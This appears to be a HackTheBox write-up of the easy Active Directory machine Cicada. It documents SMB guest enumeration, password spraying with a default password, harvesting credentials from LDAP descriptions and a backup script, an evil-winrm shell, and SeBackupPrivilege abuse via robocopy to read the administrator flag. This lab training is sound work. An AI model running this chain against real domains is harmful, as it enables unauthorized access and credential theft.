HackTheBox: Cicada
HackTheBox: Cicada
Cicada is an easy HackTheBox machine which simulates an Active Directory environment where we first start by enumerating SMB shares and users available on the box finding a user credentials that allowed gaining a shell from there we leverage an SeBackupPrivilege permission to read root flag.
Enumeration
Nmap Scan
Starting with an nmap on 10.129.118.121
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
# Nmap 7.94SVN scan initiated Sat Sep 28 20:00:55 2024 as: nmap -sC -sV -T4 -oN cicada.out -vv -Pn 10.129.118.121
Nmap scan report for 10.129.118.121
Host is up, received user-set (0.077s latency).
Scanned at 2024-09-28 20:01:01 CET for 99s
Not shown: 991 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2024-09-29 02:01:14Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
636/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
| SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
| SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
3269/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
| SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 33002/tcp): CLEAN (Timeout)
| Check 2 (port 30462/tcp): CLEAN (Timeout)
| Check 3 (port 23118/udp): CLEAN (Timeout)
| Check 4 (port 23887/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2024-09-29T02:01:56
|_ start_date: N/A
|_clock-skew: 6h59m59s
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Sep 28 20:02:40 2024 -- 1 IP address (1 host up) scanned in 104.31 seconds
Looking at the results we get an Active Directory environment. Adding the domain to our /etc/hosts.
1
2
3
4
5
6
7
8
127.0.0.1 localhost
127.0.1.1 voldemort
10.129.118.121 CICADA-DC.cicada.htb cicada.htb
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
SMB Shares
Trying to log in into SMB using Guest account we were able to do it successfully.
1
2
3
4
┌──(str4ngerx㉿voldemort)-[~/Desktop/HackTheBox/Cicada]
└─$ nxc smb 10.129.118.121 -u 'guest' -p ''
SMB 10.129.118.121 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.118.121 445 CICADA-DC [+] cicada.htb\guest:
Listing all available shares we found 2 of them being interesting, DEV and HR.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(str4ngerx㉿voldemort)-[~/Desktop/HackTheBox/Cicada]
└─$ nxc smb 10.129.118.121 -u 'guest' -p '' --shares
SMB 10.129.118.121 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.118.121 445 CICADA-DC [+] cicada.htb\guest:
SMB 10.129.118.121 445 CICADA-DC [*] Enumerated shares
SMB 10.129.118.121 445 CICADA-DC Share Permissions Remark
SMB 10.129.118.121 445 CICADA-DC ----- ----------- ------
SMB 10.129.118.121 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.118.121 445 CICADA-DC C$ Default share
SMB 10.129.118.121 445 CICADA-DC DEV
SMB 10.129.118.121 445 CICADA-DC HR READ
SMB 10.129.118.121 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.118.121 445 CICADA-DC NETLOGON Logon server share
SMB 10.129.118.121 445 CICADA-DC SYSVOL Logon server share
Looking into DEV we weren’t able to list it. HR on the other hand is accessible, looking into it we were able to find a text file.
1
2
3
4
5
6
7
8
9
10
┌──(str4ngerx㉿voldemort)-[~/Desktop/HackTheBox/Cicada]
└─$ smbclient //10.129.118.121/HR
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Mar 14 13:29:09 2024
.. D 0 Thu Mar 14 13:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 18:31:48 2024
4168447 blocks of size 4096. 330884 blocks available
smb: \>
Using get "Notice from HR.txt" we were able to retrieve the file and read its content.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(str4ngerx㉿voldemort)-[~/Desktop/HackTheBox/Cicada]
└─$ cat Notice\ from\ HR.txt
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: [REDACTED]
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada Corp
Exploitation
Michael’s Credentials
We got a password! Having a wordlist of users from nxc we bruteforced our way in and we got a hit using user michael.wrightson.
1
2
3
4
5
6
7
8
9
CICADA\Administrator
CICADA\Guest
CICADA\krbtgt
CICADA\CICADA-DC$
CICADA\john.smoulder
CICADA\sarah.dantelia
CICADA\michael.wrightson
CICADA\david.orelious
CICADA\emily.oscars
1
2
3
4
5
6
7
8
9
10
┌──(str4ngerx㉿voldemort)-[~/Desktop/HackTheBox/Cicada]
└─$ nxc smb 10.129.118.121 -u users.list -p '[REDACTED]'
SMB 10.129.118.121 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.118.121 445 CICADA-DC [-] CICADA\Administrator:[REDACTED] STATUS_LOGON_FAILURE
SMB 10.129.118.121 445 CICADA-DC [-] CICADA\Guest:[REDACTED] STATUS_LOGON_FAILURE
SMB 10.129.118.121 445 CICADA-DC [-] CICADA\krbtgt:[REDACTED] STATUS_LOGON_FAILURE
SMB 10.129.118.121 445 CICADA-DC [-] CICADA\CICADA-DC$:[REDACTED] STATUS_LOGON_FAILURE
SMB 10.129.118.121 445 CICADA-DC [-] CICADA\john.smoulder:[REDACTED] STATUS_LOGON_FAILURE
SMB 10.129.118.121 445 CICADA-DC [-] CICADA\sarah.dantelia:[REDACTED] STATUS_LOGON_FAILURE
SMB 10.129.118.121 445 CICADA-DC [+] CICADA\michael.wrightson:[REDACTED]
David’s Credentials
Using ldapdomaindump to dump users info we got david.orelious’ password in his description.
1
2
┌──(str4ngerx㉿voldemort)-[~/Desktop/HackTheBox/Cicada]
└─$ ldapdomaindump ldap://10.129.118.121 -u 'cicada.htb\michael.wrightson' -p '[REDACTED]'
Grepping david.orelious on domain_users.grep we were able to retrieve the password.
1
2
3
┌──(str4ngerx㉿voldemort)-[~/Desktop/HackTheBox/Cicada]
└─$ cat domain_users.grep | grep david.orelious
David Orelious David Orelious david.orelious Domain Users 03/14/24 12:17:29 08/28/24 17:25:57 03/15/24 06:32:21 NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD 03/14/24 12:17:29 S-1-5-21-917908876-1423158569-3159038727-1108 Just in case I forget my password is [REDACTED]
Once we obtained the password we tried listing the DEV share and it worked!
1
2
3
4
5
6
7
8
9
10
11
┌──(str4ngerx㉿voldemort)-[~/Desktop/HackTheBox/Cicada]
└─$ smbclient -U david.orelious //cicada.htb/DEV
Password for [WORKGROUP\david.orelious]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Mar 14 13:31:39 2024
.. D 0 Thu Mar 14 13:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 18:28:22 2024
4168447 blocks of size 4096. 330788 blocks available
smb: \>
Initial Foothold - Emily
getting that ps1 file we found emily’s password.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(str4ngerx㉿voldemort)-[~/Desktop/HackTheBox/Cicada]
└─$ cat Backup_script.ps1
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "[REDACTED]" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
After finding the password we tried logging in using evil-winrm with the credentials obtained.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(str4ngerx㉿voldemort)-[~/Desktop/HackTheBox/Cicada]
└─$ evil-winrm -i 'cicada.htb' -u 'emily.oscars' -p '[REDACTED]'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> dir
Directory: C:\Users\emily.oscars.CICADA\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 9/28/2024 7:31 PM 34 user.txt
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> type user.txt
486b9d****44508
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop>
And there we have our user flag!
Privilege Escalation
For the privilege escalation, we first started by looking into our privileges.
1
2
3
4
5
6
7
8
9
10
11
12
13
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop>
We see SeBackupPrivilege which can be leveraged to escalate our privileges. Here is a blog post that talks about it.
Executing this command will result in copying the root.txt file to C:\Users\root.txt.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> robocopy C:\Users\Administrator\desktop C:\Users\root.txt /B
-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------
Started : Saturday, September 28, 2024 9:42:13 PM
Source : C:\Users\Administrator\desktop\
Dest : C:\Users\
Files : root.txt
Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30
------------------------------------------------------------------------------
1 C:\Users\Administrator\desktop\
New File 34 root.txt
0%
100%
------------------------------------------------------------------------------
Total Copied Skipped Mismatch FAILED Extras
Dirs : 1 0 1 0 0 0
Files : 1 1 0 0 0 0
Bytes : 34 34 0 0 0 0
Times : 0:00:00 0:00:00 0:00:00 0:00:00
Ended : Saturday, September 28, 2024 9:42:13 PM
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> type C:\Users\root.txt
4ee62bcf****6ceef51f5
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop>
And there you go, we pwned the box successfully!
This post is licensed under CC BY 4.0 by the author.